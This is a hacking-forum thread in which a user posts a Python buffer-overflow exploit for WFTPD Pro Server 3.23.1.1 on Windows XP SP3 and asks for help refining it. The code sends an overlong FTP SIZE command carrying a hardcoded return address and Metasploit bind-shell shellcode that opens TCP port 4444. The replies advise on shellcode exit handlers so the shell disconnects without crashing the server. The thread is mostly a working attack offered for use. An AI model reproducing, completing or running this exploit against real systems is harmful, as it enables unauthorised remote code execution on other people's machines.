Results 1 to 4 of 4

Thread: wftpd DoS made exploit

  1. #1
    Just burned their ISO reaperz's Avatar
    Join Date
    Jan 2010
    Posts
    18

    Default wftpd DoS made exploit

    I found a DoS attack for wftpd on milw0rm. I thought it would be fun to do a full blown exploit out of it. Here is what I have done so far. It opens a bind shell port 4444. It works great but the only problem is that it crashes the wftp server hard on shell disconnect. It was fun to do and could be better. Guess I like messing with outdated software. You have to start somewhere , Right?
    I would like some help on a softer exit.

    Code:
    #!/usr/bin/env python
    
    #####################################################################
    #  WFTPD Pro Server 3.23.1.1 Buffer Overflow use 7E429353 for xp sp3  
    #  By: reaperz
    #  Original DoS attack found on milw0rm by:Joxean Koret
    #  Tested on XP SP3 for educational use only
    #####################################################################
    import sys
    import struct
    import ftplib
    print "#################################################################"
    print "#  WFTPD Pro Server 3.23.1.1 Buffer Overflow use 7E429353 for xp sp3"
    print "#################################################################"
    target = "192.168.1.100"
    targetPort = "21"
    ret='\x53\x93\x42\x7e' # jump esp users32.dll
    
    #Portbind shellcode from metasploit; Binds port to TCP port 4444
    sc = ("\xfc\xbb\xbe\xea\xa1\xd5\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3"
    "\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x42\x02\x28\xd5\xba"
    "\xd3\x4b\x5f\x5f\xe2\x59\x3b\x14\x57\x6e\x4f\x78\x54\x05\x1d"
    "\x68\xef\x6b\x8a\x9f\x58\xc1\xec\xae\x59\xe7\x30\x7c\x99\x69"
    "\xcd\x7e\xce\x49\xec\xb1\x03\x8b\x29\xaf\xec\xd9\xe2\xa4\x5f"
    "\xce\x87\xf8\x63\xef\x47\x77\xdb\x97\xe2\x47\xa8\x2d\xec\x97"
    "\x01\x39\xa6\x0f\x29\x65\x17\x2e\xfe\x75\x6b\x79\x8b\x4e\x1f"
    "\x78\x5d\x9f\xe0\x4b\xa1\x4c\xdf\x64\x2c\x8c\x27\x42\xcf\xfb"
    "\x53\xb1\x72\xfc\xa7\xc8\xa8\x89\x35\x6a\x3a\x29\x9e\x8b\xef"
    "\xac\x55\x87\x44\xba\x32\x8b\x5b\x6f\x49\xb7\xd0\x8e\x9e\x3e"
    "\xa2\xb4\x3a\x1b\x70\xd4\x1b\xc1\xd7\xe9\x7c\xad\x88\x4f\xf6"
    "\x5f\xdc\xf6\x55\x37\x11\xc5\x65\xc7\x3d\x5e\x15\xf5\xe2\xf4"
    "\xb1\xb5\x6b\xd3\x46\xba\x41\xa3\xd9\x45\x6a\xd4\xf0\x81\x3e"
    "\x84\x6a\x20\x3f\x4f\x6b\xcd\xea\xc0\x3b\x61\x45\xa1\xeb\xc1"
    "\x35\x49\xe6\xce\x6a\x69\x09\x05\x1d\xad\xc7\x7e\x4d\x5a\x2a"
    "\x80\x63\xc6\xa3\x66\xe9\xe6\xe5\x31\x86\xc4\xd1\x8a\x31\x36"
    "\x30\xa7\xea\xa0\x0c\xae\x2d\xce\x8c\xe5\x1d\x63\x24\x6d\xd6"
    "\x6f\xf1\x8c\xe9\xa5\x51\xc7\xd1\x2e\x2b\xb9\x90\xcf\x2c\x90"
    "\x43\x73\xbe\x7e\x94\xfa\xa3\x29\xc3\xab\x12\x23\x81\x41\x0c"
    "\x9d\xb4\x9b\xc8\xe6\x7d\x40\x29\xe9\x7c\x05\x15\xcd\x6e\xd3"
    "\x96\x49\xdb\x8b\xc0\x07\xb5\x6d\xbb\xe9\x6f\x24\x10\xa3\xe7"
    "\xb1\x5a\x74\x7e\xbe\xb6\x03\x9e\x0f\x6f\x55\xa0\xa0\xe7\x51"
    "\xd9\xdc\x97\x9e\x30\x65\xb7\x7d\x91\x90\x50\xdb\x70\x19\x3d"
    "\xdc\xae\x5e\x38\x5e\x5b\x1f\xbf\x7e\x2e\x1a\xfb\x39\xc2\x56"
    "\x94\xaf\xe4\xc5\x95\xfa\xe5\xe9\x69\x04\xe6\xe9\x69")
    a = "\\\\A:"
    
    try:
        ftp = ftplib.FTP()
        print "[+] Connecting to target "
        msg = ftp.connect(target, targetPort)
        print "[+] Ok. Target banner"
        print msg
        print
        print "[+] Trying to login anonymously"
        msg = ftp.login()
        print "[+] Ok. Message"
        print msg
        print
    except:
        print "[!] BYE. " + str(sys.exc_info()[1])
        sys.exit(0)
    
    
    for i in range(6):
        a += a
    
    buffer = a  + '\x41'*334 + ret + '\x90'*4 + sc + '\x90'*200
    try:
        msg = ftp.sendcmd("SIZE " + buffer)
        print "[!] Exploit doesn't work [" + msg + "]"
    except:
        print "[+] Exploit apparently works. Telnet to the host on port 4444 "

  2. #2
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    What was your exit handler? SEH? Thread or process? (or whatever the options are)

    They're options available for the msfpayload command, have a look through MSFU if you need on the offsec site.

    I like to play with all three handlers if I am not sure which to use, but normally it's a thread exit for me.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  3. #3
    Just burned their ISO reaperz's Avatar
    Join Date
    Jan 2010
    Posts
    18

    Default

    Quote Originally Posted by Gitsnik View Post
    What was your exit handler? SEH? Thread or process? (or whatever the options are)

    They're options available for the msfpayload command, have a look through MSFU if you need on the offsec site.

    I like to play with all three handlers if I am not sure which to use, but normally it's a thread exit for me.
    So try each of these (SEH, Thread or process ) until I get a smooth exit?
    Thanks for the reply.

  4. #4
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Quote Originally Posted by reaperz View Post
    So try each of these (SEH, Thread or process ) until I get a smooth exit?
    Thanks for the reply.
    Some exits may be smoother than others (a lock rather than a crash for example, though that's less clean). It is often dependent on the machine. That said, if the system crashes (one assumes you've migrated your meterpreter or gotten access elsewhere) at least you can just restart it with a shell.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •